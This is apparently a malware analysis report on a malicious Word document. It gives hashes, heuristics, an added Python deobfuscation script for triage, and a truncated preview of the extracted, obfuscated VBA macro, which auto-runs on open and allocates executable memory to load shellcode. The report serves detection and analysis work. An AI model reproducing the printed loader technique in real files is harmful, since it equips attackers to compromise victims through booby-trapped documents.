Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 59dc090596bd3ecc…

MALICIOUS

Office (OLE)

Size: 194.5 KB
Created: 2017-11-07 14:51:00
Authoring application: Microsoft Office Word
First seen: 2017-11-13
MD5: 51de8a9ca8e5a685c300dfbfca865ff0
SHA-1: f2d8477678163031779adf0ccd79ca845f29f9b5
SHA-256: 59dc090596bd3eccce006aba8ed618487c125975ac101e50a926bd5ef10cbdd4
Risk Score: 122

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The file is a Microsoft Word document carrying VBA macros with a Document_Open handler, the standard auto-execution entry point for a spearphishing attachment (it runs as soon as the victim enables macros). The module is obfuscated: procedure and variable names are dictionary words, every numeric parameter is written as arithmetic (for example 54 - 70 + 80), the #If conditional-compilation tests hide a plain 32-bit/64-bit branch, library names are padded with trailing spaces ("ntdll   ", "Kernel32   ") to defeat naive string matching, and calls to the financial function Pmt and to other procedures are inserted as noise. Both branches declare NtAllocateVirtualMemory and NtWriteVirtualMemory from ntdll and CreateTimerQueueTimer from Kernel32. Folding the arithmetic in the guardian function gives NtAllocateVirtualMemory(-1, &base, 0, 9776, 0x1000, 0x40): a 9776-byte MEM_COMMIT region with PAGE_EXECUTE_READWRITE protection in the current process (handle -1, the GetCurrentProcess pseudo-handle). The hence helper first reads the pointer stored at offset 8 of the Variant argument (4 bytes on 32-bit, 8 on 64-bit) and then copies 7 - 89 + 5965 = 5883 bytes from that pointer into the new region; its body is cut off in the preview, but the call pattern is that of a wrapper around NtWriteVirtualMemory. This is the classic in-process shellcode loader: write an embedded blob into an RWX buffer and start it through a timer-queue callback (CreateTimerQueueTimer) instead of CreateThread. The 64-bit branch additionally declares SleepConditionVariableSRW and GetOverlappedResult from Shlwapi.dll; both are kernel32 exports, so those declarations cannot resolve and are padding. ClamAV's Doc.Dropper.Agent-6367788-0 signature is consistent with a shellcode-loading dropper. No download primitive (URLDownloadToFile, WinHTTP, XMLHTTP, a URL string) appears in the decoded VBA, and the only extracted URLs are XMP and DrawingML namespace URIs, so any second-stage retrieval would have to happen inside the shellcode itself; confirming that requires carving the blob or running the document dynamically.
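The obfuscation described above can be undone mechanically before any sandbox run. The following Python script is an added example written for this report, not part of the analysis platform or of the sample: given olevba-style decoded VBA, it joins line continuations, lists every Declare with its real API name (flagging memory-injection APIs and library mismatches such as a kernel32 export declared from Shlwapi.dll), finds auto-executing entry points such as Document_Open, folds the integer arithmetic used for constants and inside #If tests, and labels the NtAllocateVirtualMemory arguments. The embedded SAMPLE_VBA is a constructed excerpt modelled on the Declare lines and the guardian function of the extracted macro shown below, with the long parameter lists shortened; the lookup tables (API_HOME, INJECTION_APIS, ALLOC_TYPE, PROTECT) are the script's own assumptions, not platform output.

```python
"""Recover obfuscated Win32 parameters from olevba-decoded VBA (added triage example)."""
import ast
import re

# Constructed sample modelled on the guardian()/Declare lines of this report; parameter lists shortened.
SAMPLE_VBA = r'''
#If Not (88 - 11 * 8) * 30 < (Win64) And (13 * 3 + 5) > (8 - 3 * 1) Then
Public Declare Function anthocerotaceae _
Lib "ntdll   " alias _
"NtAllocateVirtualMemory" (a As Long, b As Long, ByVal c As Long, d As Long, e As Long, ByVal f As Long) As Long
Public Declare Function prophesy Lib "Kernel32   " alias "CreateTimerQueueTimer" (a As Any) As Long
#End If
Public Declare PtrSafe Function discouraged Lib "ntdll   " Alias "NtWriteVirtualMemory" (ByVal a As Any) As LongPtr
Public Declare PtrSafe Function antecedent Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal a As Any) As LongPtr
Private Sub Document_Open()
exhibition = 70 + 7
End Sub
Function guardian(satellite)
ostryopsis = 98 - 12 - 87
anarhichas = 50 - 118 + 68
pork = 121 - 69 - 52
arithmetician = 96 - 75 + 9755
traces = 39 - 13 + 4070
unfoldment = 54 - 70 + 80
lover = anthocerotaceae(ByVal ostryopsis, _
anarhichas, _
ByVal pork, arithmetician, ByVal traces, _
ByVal unfoldment)
End Function
'''

# Assumed tables: home DLL of each API (a Declare naming another DLL cannot resolve at call time),
# APIs typical of in-process shellcode loaders, auto-exec procedure names, and flag values.
API_HOME = {"ntallocatevirtualmemory": "ntdll", "ntwritevirtualmemory": "ntdll",
            "createtimerqueuetimer": "kernel32", "sleepconditionvariablesrw": "kernel32",
            "getoverlappedresult": "kernel32", "virtualalloc": "kernel32", "createthread": "kernel32"}
INJECTION_APIS = {"ntallocatevirtualmemory", "virtualalloc", "virtualallocex", "ntwritevirtualmemory",
                  "writeprocessmemory", "rtlmovememory", "createthread", "createremotethread",
                  "createtimerqueuetimer", "enumwindows", "queueuserapc", "virtualprotect"}
AUTOEXEC = {"document_open", "autoopen", "auto_open", "workbook_open", "autoexec", "document_close"}
ALLOC_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x3000: "MEM_COMMIT|MEM_RESERVE"}
PROTECT = {0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
DECL_RE = re.compile(r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]*)"'
                     r'(?:\s+Alias\s+"([^"]*)")?', re.I)
NUM_RUN = r"[\d\t +\-*()]+"          # a run of integer-arithmetic characters

def join_continuations(src):
    """Collapse VBA ' _' line continuations so each statement occupies one line."""
    return re.sub(r"[ \t]+_\r?\n[ \t]*", " ", src)

def eval_int_expr(expr):
    """Evaluate pure integer + - * arithmetic through the ast (no eval()); None for anything else."""
    ops = {ast.Add: lambda a, b: a + b, ast.Sub: lambda a, b: a - b, ast.Mult: lambda a, b: a * b}
    def walk(n):
        if isinstance(n, ast.Constant) and isinstance(n.value, int):
            return n.value
        if isinstance(n, ast.UnaryOp) and isinstance(n.op, ast.USub):
            return -walk(n.operand)
        if isinstance(n, ast.BinOp) and type(n.op) in ops:
            return ops[type(n.op)](walk(n.left), walk(n.right))
        raise ValueError("not pure integer arithmetic")
    try:
        return walk(ast.parse(expr.strip(), mode="eval").body)
    except (SyntaxError, ValueError):
        return None

def fold_constants(src):
    """Map variable -> value for every 'name = <integer arithmetic>' assignment."""
    pairs = re.findall(rf"^[ \t]*(\w+)[ \t]*=[ \t]*({NUM_RUN})$", join_continuations(src), re.M)
    return {k: v for k, v in ((k, eval_int_expr(e)) for k, e in pairs) if v is not None}

def fold_conditionals(src):
    """Reduce arithmetic and integer comparisons inside #If/#ElseIf lines, exposing the Win64 test."""
    def num(m):
        v = eval_int_expr(m.group(0))
        return m.group(0) if v is None else f" {v} "
    def cmp(m):
        a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
        return str(a < b if op == "<" else a > b)
    return [re.sub(r"(-?\d+)\s*([<>])\s*(-?\d+)", cmp, re.sub(NUM_RUN, num, line)).strip()
            for line in src.splitlines() if line.lstrip().startswith(("#If", "#ElseIf"))]

def extract_declares(src):
    """Every Declare with its real API name, normalised DLL, and two red flags."""
    out = []
    for name, lib, alias in DECL_RE.findall(join_continuations(src)):
        api = alias or name
        lib = lib.strip().lower().removesuffix(".dll")   # strip the "ntdll   " padding
        out.append({"vba_name": name, "lib": lib, "api": api, "injection": api.lower() in INJECTION_APIS,
                    "lib_mismatch": API_HOME.get(api.lower(), lib) != lib})
    return out

def autoexec_entry_points(src):
    """Auto-executing procedures (Document_Open etc.) defined in the module."""
    subs = re.findall(r"^[ \t]*(?:Private[ \t]+|Public[ \t]+)?Sub[ \t]+(\w+)", src, re.M | re.I)
    return sorted(s for s in subs if s.lower() in AUTOEXEC)

def resolve_call(src, consts, func_name):
    """Argument values passed to func_name, with folded constants substituted for variable names."""
    m = re.search(rf"\b{re.escape(func_name)}\s*\((.*)\)[ \t]*$", join_continuations(src), re.M)
    if not m:
        return None
    args = [re.sub(r"^ByVal\s+", "", a.strip(), flags=re.I) for a in m.group(1).split(",")]
    return [consts.get(a, a) for a in args]

def describe_nt_allocate(args):
    """Name the NtAllocateVirtualMemory(Handle, *Base, ZeroBits, *Size, AllocType, Protect) arguments."""
    h, base, _zero, size, alloc, prot = args
    label = lambda table, v: table.get(v, hex(v)) if isinstance(v, int) else v
    return {"process": "current (-1 pseudo-handle)" if h == -1 else h, "base": base, "size": size,
            "alloc": label(ALLOC_TYPE, alloc), "protect": label(PROTECT, prot)}

def triage(src):
    """Run every check and return one dict an analyst (or a test) can read."""
    consts, decls = fold_constants(src), extract_declares(src)
    alloc_name = next((d["vba_name"] for d in decls if d["api"].lower() == "ntallocatevirtualmemory"), None)
    args = resolve_call(src, consts, alloc_name) if alloc_name else None
    return {"entry_points": autoexec_entry_points(src), "declares": decls, "constants": consts,
            "conditionals": fold_conditionals(src),
            "nt_allocate": describe_nt_allocate(args) if args and len(args) == 6 else None}

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_VBA), indent=2))
```

Run as a script it prints the triage dictionary as JSON; for the constructed sample it reports Document_Open as the entry point, reduces the conditional to `#If Not 0 < (Win64) And True Then`, marks SleepConditionVariableSRW as declared from the wrong library, and decodes the allocation as 9776 bytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE in the current process. Pointing `triage` at the decoded macros.bas extracted by olevba gives the same view of the full module, and the copy length in the hence call (7 - 89 + 5965) folds to 5883 the same way.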

Heuristics (4)

  • ClamAV: Doc.Dropper.Agent-6367788-0 (severity: critical, id: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6367788-0
  • VBA macros detected (severity: medium, id: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high, id: OLE_VBA_DOCOPEN)
    Document contains a Document_Open procedure, which Word runs automatically once the user enables macros
  • Embedded URL (severity: info, id: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All eight URLs below come from the OLE body, not from the macro. They are XML namespace identifiers (Adobe XMP, RDF, Dublin Core, Photoshop metadata and Office DrawingML), the residue of an embedded image's metadata and of the document's drawing markup, and are not network indicators.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  34695 bytes
SHA-256: 703c7e6754d3acbee009e9f400cb8bf8f8ede429b75a542de7559820e4a4e6ae
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Private Sub Document_Open()
Dim deaconship As Variant
Dim stoneblind As String
barratrous = straggly
greenness = "modernism"
disbar
exhibition = 70 + 7
 Pmt 0, exhibition, 23427, 52504, 3
End Sub


Attribute VB_Name = "aeromancy"
#If Not (88 - 11 * 8) * 30 < (Win64) And (13 * 3 + 5) > (8 - 3 * 1) Then
Public Declare Function anthocerotaceae _
Lib "ntdll   " alias _
"NtAllocateVirtualMemory" (beninese As Long, marlin As Long, ByVal arcade As Long, conciliationByVal As Long, methodical As Long, ByVal awakened As Long) As Long
Public Declare Function discouraged _
Lib "ntdll   " alias _
"NtWriteVirtualMemory" (ByVal perfumer As Any, ByVal pericranium As Any, ByVal vet As Any, ByVal drudging As Any, ByVal noonday As Any) As Long
Public Declare Function prophesy Lib "Kernel32   " alias "CreateTimerQueueTimer" (duval As Any, ByVal brogue As Any, ByVal perdidit As Any, ByVal placidly As Any, ByVal atlanta As Any, ByVal moles As Any, ByVal tecta As Any) As Long
#End If
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
Public Declare PtrSafe Function anthocerotaceae _
Lib "ntdll   " Alias _
"NtAllocateVirtualMemory" (ameboid As LongPtr, cleanse As LongPtr, ByVal absquatulate As LongPtr, monsieurByVal As LongPtr, nonionic As LongPtr, ByVal ode As LongPtr) As LongPtr
Public Declare PtrSafe Function antecedent Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal adiantaceae As Any, associational As Any, mastitis As Any, calomel As Any) As LongPtr
Public Declare PtrSafe Function peptide Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal dreyfus As Any, noncombustible As Any, click As Any, chufa As Any) As LongPtr
Public Declare PtrSafe Function discouraged _
Lib "ntdll   " Alias _
"NtWriteVirtualMemory" (ByVal ruler As Any, ByVal ableism As Any, ByVal tasmanian As Any, ByVal cataract As Any, ByVal ergot As Any) As LongPtr
Public Declare PtrSafe Function prophesy Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (boatmanship As Any, ByVal noncyclic As Any, ByVal sainthood As Any, ByVal biskek As Any, ByVal mothball As Any, ByVal ametropic As Any, ByVal headmost As Any) As Long
#End If


Attribute VB_Name = "seasonably"
Attribute VB_Base = "0{E0936F7E-9C38-4596-8AF7-A18A55113082}{A8B21F1C-CD40-4DD3-B6D0-8DAE611197A2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "boxits"
Function guardian(satellite)
Dim eisen As Variant
Dim saintship As String
Dim tastelessly As Variant
Dim cholangiography As String
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
Dim balefully As Byte
Dim cuspidation As LongPtr
cyclostyle = 10 - 128 + 126
Dim anarhichas As LongPtr
Dim neutralism As Variant
Dim abuzz As String
Dim arithmetician As LongPtr
Dim trow As Variant
#ElseIf (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
Dim cuspidation As Long
cyclostyle = 105 - 16 - 85
Dim anarhichas As Long
Dim arithmetician As Long
#End If
finds = VarPtr(cuspidation)
ethnic = hence(finds, VarPtr(satellite) + 8, cyclostyle)
ostryopsis = 98 - 12 - 87
anarhichas = 50 - 118 + 68
pork = 121 - 69 - 52
arithmetician = 96 - 75 + 9755
traces = 39 - 13 + 4070
unfoldment = 54 - 70 + 80
lover = anthocerotaceae(ByVal ostryopsis, _
anarhichas, _
ByVal pork, arithmetician, ByVal traces, _
ByVal unfoldment)
selfappointed = halogeton
hence anarhichas, cuspidation, 7 - 89 + 5965
bigbellied = 40 + 10
Pmt 0, bigbellied, 36445, 18072, 6
guardian = anarhichas
End Function

Function hence(roulette, trite, calling)
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
Dim pr
... (truncated)